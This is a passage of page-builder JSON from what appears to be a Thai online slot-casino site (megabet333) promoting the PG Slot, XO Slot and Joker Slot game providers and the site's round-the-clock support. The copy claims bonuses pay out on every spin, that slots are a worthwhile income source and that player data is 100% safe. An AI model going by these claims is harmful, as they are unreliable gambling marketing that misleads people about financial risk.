<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_3_-_Megabet333-Biz.webp\",\"id\":52,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d 